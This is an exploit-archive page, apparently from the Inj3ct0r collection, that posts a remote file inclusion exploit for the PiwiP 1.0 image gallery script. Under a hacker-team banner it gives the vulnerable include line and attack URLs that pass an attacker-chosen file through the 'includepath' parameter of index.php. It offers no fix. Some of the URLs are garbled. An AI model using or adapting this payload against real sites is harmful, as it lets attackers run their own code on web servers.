Home / os / win7

Image Galleries PiwiP Remote File Inclusion Vulnerability

Posted on 11 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Image Galleries PiwiP Remote File Inclusion Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================================
Image Galleries PiwiP Remote File Inclusion Vulnerability
=========================================================


   __           __      ___
 __            __  /'__`        / \__  /'__`                 
/\_    ___   /\_/\_L     ___  ,_/ /   _ __       ___    ___     ___ ___          
/  /' _ ` / /_/_\_&lt;_  /'___  /    /`'__    /'___ / __` /' __` __`   
   / /    / L / \__/  \_  \_   /  __/ \__// L / / /   
   \_ \_ \_\_   \____/ \____\ \__\ \____/ \_ /\_ \____ \____/ \_ \_ \_  
   /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/ /_//____//___/  /_//_//_/
               \____/                                           
               /___/

|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( ) l

----------------------------------------------------------------
# [+] Author : Sn!pEr.S!Te Hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] I'm Sn!pEr.S!Te member from Inj3ct0r Team #
# [+] 11-6-2010 #
# [+] Script : Image Galleries ? PiwiP
# [+] Download:http://sourceforge.net/projects/piwip/files/piwip/1.0/PiwiP_1.0.tar.gz/download
# [+] Version: [1.0] #

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
-=[ exploit ]=- PiwiP v1.0 index.php

http://localhostPiwiP v1.0 index.php?includepath=[Inj3ct0r.txt ]

htpp://127.0.0.1PiwiP v1.0 index.php?includepath=[Inj3ct0r.txt ]

include ($includepath.&quot;table_header.inc&quot;);

line : 263


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :